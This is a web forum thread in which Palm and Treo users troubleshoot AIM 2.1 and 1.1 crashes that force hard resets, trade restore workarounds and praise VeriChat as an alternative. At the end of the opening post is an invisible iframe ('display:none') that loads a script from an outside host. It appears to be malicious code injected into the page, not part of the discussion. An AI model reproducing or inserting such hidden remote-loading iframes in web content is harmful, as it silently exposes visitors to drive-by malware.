+ Reply to Thread

AIM 2.1 causes Fatal Alert, only a hard-reset will revive

I'm a beta tester for AOL's new palm apps. In testing AIM 2.1, I am getting Fatal Alert "DataMgr.c, Line: 9573, Index out of range". Only a hard reset will revive the phone. Once I reset, I need to remove AIM from the list of backed-up files to be resinstalled, or else the first synch (restoring from backup) puts the phone right back into Fatal Alert territory. As soon as I reinstall AIM, the problem comes back. I'm not going to reinstall AIM any more. Oddly, AIM was working for a few days, and this just cropped up today out of nowhere.
    I have reported this to the AOL beta folks, but I thought I'd pass this along here to see if anyone has any insights in general into DataMgr errors, and whether there might be some deeper problem that AIM is simply triggering.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

VeriChat: Yes, AIM for Palm: No

Originally posted by zolot
    I'm a beta tester for AOL's new palm apps. In testing AIM 2.1, I am getting Fatal Alert "DataMgr.c, Line: 9573, Index out of range". Only a hard reset will revive the phone. Once I reset, I need to remove AIM from the list of backed-up files to be resinstalled, or else the first synch (restoring from backup) puts the phone right back into Fatal Alert territory. As soon as I reinstall AIM, the problem comes back. I'm not going to reinstall AIM any more. Oddly, AIM was working for a few days, and this just cropped up today out of nowhere.
    I have reported this to the AOL beta folks, but I thought I'd pass this along here to see if anyone has any insights in general into DataMgr errors, and whether there might be some deeper problem that AIM is simply triggering.
    I bet this happen: You were working fine until you did a soft reset to your phone. After that, you could not get around the Fatal Error.

This bug has been around forever, and it is not just the 7135. My Treo fell victim to this also. Same error also, but I was on AIM 1.1. I also heard that AOL for Palm (not AIM) 3.0 is guilty of this also. Maybe its a CDMA thing, because I heard the Treo 270 never had this problem.

In any event, stay away. I use VeriChat from www.pdaapps.com and I have been VERY happy with it. It does this cool thing where it looks like you are still active, even though you are log-off'ed the Verizon network (EN or Q2N).

Re: VeriChat: Yes, AIM for Palm: No

Originally posted by zucchero
    I bet this happen: You were working fine until you did a soft reset to your phone. After that, you could not get around the Fatal Error.
    that's exactly right.
    indeed, i'll stay away from AIM.
    Thanks for the info.

i use 1.1 w/no problem

-from 7135

Originally posted by badboy513
    i use 1.1 w/no problem

-from 7135
    You are the first. I installed it on a complete clean phone, reset, and Fatal Error.

I was using 1.1 with no problem on a Visor Prism + Minstrel modem, Samsung I300, and Treo 300. AIM 1.1 was working great on my 7135 ever sine I installed it a few weeks ago and today everytime I sign on and it loads my buddy list, I get a fatal exception and I have to do a soft reset. I have not added any new software between now and then either. Very frustrating!

Wow, screw aim. i just installed verichat and it's so much better.

yeah, you look always signed on and when someone ims you, you get a text message over thephone. then you can actually reply back to them via the text messenging function and your message will show up on their im window....

anybody know how long verichat will last (demo?)

I had the same problem with AIM 1.1. I won't touch it with a 10' pole now.

Well 1.1 is working fine now. Here is the sequence of events:

AIM 1.1 causing soft resets -> Hotsync anyways
    (handheld overwrites desktop setting)

Now everytime I access the internal memory via File Manager, get a fatal error (so cannot remove AIM software)-> soft reset

Use my card reader to go into SD card Backup Buddy folder and remove all AIM.prc associated files -> hard reset then restore from SD card

After restore and soft reset, get fatal error and only hard reset will fix -> hard reset

Hotsync (desktop overwrites handheld setting) and restore -> everything, including AIM 1.1 works fine, go figure

i have been using aim just fine. i checked my version and it is 1.0 UK. wierd, i wonder how i ended up with that.

Using AIM 1.1 (build 5) with no problems.
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Originally posted by gotwalp
    i have been using aim just fine. i checked my version and it is 1.0 UK. wierd, i wonder how i ended up with that.
    I know how. You found it for free. AOL charges $19.99 for 1.1 now (how nice of them....not).

Supposidly, you can still get AOL 1.1 for free at http://www.freewarepalm.com/ , but I never tried, but again, why bother? VeriChat works better (because it makes you look like you are on all the time) and also works with Yahoo!, MSN Messenger, and if you get the latest beta, ICQ. To me, it's perfect (and no, I don't work for them).

--John

Verichat

Does this program use SMS messages for AIM type chats? If used with Verizon, would this run up my messaging bill (2 cents each)? The license agreement talks about SMS messages and email address of the phone.

i looked at freewarepalm.com and downloaded it and ended up with the same version. since i only use it to get quick answers, this version works fine. it's a shame aol charges for it, you can get aim free for your desktop.

Actually, I see that it is still listed for free on palmgear.com. The link for AOL to download the AIM for Palm OS is actually taking you to Handago. They seem to be the only ones charging for it.

A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar
    I'm beta-testing an update to the AOL mail and AIM software on my 7135. I'd recommend NOT paying for the software yet... the beta versions are substantially more stable than the public release version.
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

I use Verichat. No problems on my 7135. *knock on wood*